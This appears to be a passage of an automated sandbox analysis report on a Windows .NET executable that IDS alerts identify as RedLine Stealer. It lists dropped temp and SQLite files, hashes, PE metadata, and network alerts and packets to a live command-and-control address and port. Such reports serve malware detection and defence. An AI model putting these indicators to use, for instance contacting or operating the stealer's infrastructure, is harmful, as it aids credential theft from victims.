Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmpD155.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmpD156.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmpD157.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmpD177.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD178.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD189.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD18A.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD19A.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD19B.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.761554280381937
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	9dOKGgFNL2.exe
File size:	534'528 bytes
MD5:	020ec1df3b8b9d28da16edaf0d50a262
SHA1:	b9b841c39445febc098f7edbda4112194615fc10
SHA256:	6eaf9b6af911a7995d490906ff5d42a36a47e4b1d4510f6fc33c7cdab2c80aae
SHA512:	214c186d842409891d905d612223b944ec8e0d86cb344aada20e35b211ec908c84469d266d961162e7d70d4300471c7d9ce1401e7552b10d8d7d9412b96d5261
SSDEEP:	12288:IMyCpQuRWIPxTIeVJbZnjlz3W/9Fex4XmwRzbgTzzha+:IMyCQuHzHx6/XeKXJy1
TLSH:	6EB40164FA25E957CAE547F81431D3BA07B68D4DE812D3039FEAACD73C06B1D6A04293
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3g..............0..............&... ...@....@.. ....................................`................................

File Icon


Icon Hash:	1bb3b3b3b3d389b3

Static PE Info

General

Entrypoint:	0x48269e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6733F893 [Wed Nov 13 00:53:39 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8264b	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x1b48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x806d8	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x806a4	0x80800	df1912e430955b2a4cbcfee03a136d9c	False	0.8940809672908561	data	7.770995746521688	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x1b48	0x1c00	57997b2441a336a16ef2b08040b4c0b4	False	0.7726004464285714	data	7.226831072922865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x86000	0xc	0x200	d8d6d45757f1a173512e291562cbb0d5	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x84130	0x151a	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8863383931877082
RT_GROUP_ICON	0x8564c	0x14	data	0.9
RT_VERSION	0x85660	0x2fc	data	0.4410994764397906
RT_MANIFEST	0x8595c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-17T03:07:03.465942+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49733	45.137.22.126	55615	TCP
2024-11-17T03:07:08.476379+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	45.137.22.126	55615	192.168.2.4	49733	TCP
2024-11-17T03:07:08.786615+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49733	45.137.22.126	55615	TCP
2024-11-17T03:07:11.420400+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	45.137.22.126	55615	192.168.2.4	49733	TCP
2024-11-17T03:07:11.420400+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	45.137.22.126	55615	192.168.2.4	49733	TCP
2024-11-17T03:07:11.473182+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49737	45.137.22.126	55615	TCP
2024-11-17T03:07:13.993295+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49738	45.137.22.126	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2024 03:07:02.567902088 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:02.573175907 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:02.573249102 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:02.587853909 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:02.592741013 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:02.935049057 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:02.940236092 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:03.422421932 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:03.465941906 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:08.471224070 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:08.471296072 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:08.476378918 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:08.476547956 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:08.786478996 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:08.786526918 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:08.786561966 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:08.786598921 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:08.786614895 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:08.786633968 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:08.786705971 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:08.840959072 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.414999962 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.415204048 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.420197010 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.420280933 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.420399904 CET	55615	49733	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.420510054 CET	49733	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.420854092 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.421082973 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.425668001 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.425987959 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.425997019 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.426048994 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.426057100 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.426069021 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.426084995 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.426166058 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.426182032 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.426223993 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.426610947 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.430351019 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.430360079 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.430418968 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.431015968 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.431056023 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.431077003 CET	49737	55615	192.168.2.4	45.137.22.126
Nov 17, 2024 03:07:11.431128025 CET	55615	49737	45.137.22.126	192.168.2.4
Nov 17, 2024 03:07:11.431129932 CET	49737	55615	192.168.2.4	45.137.22.126
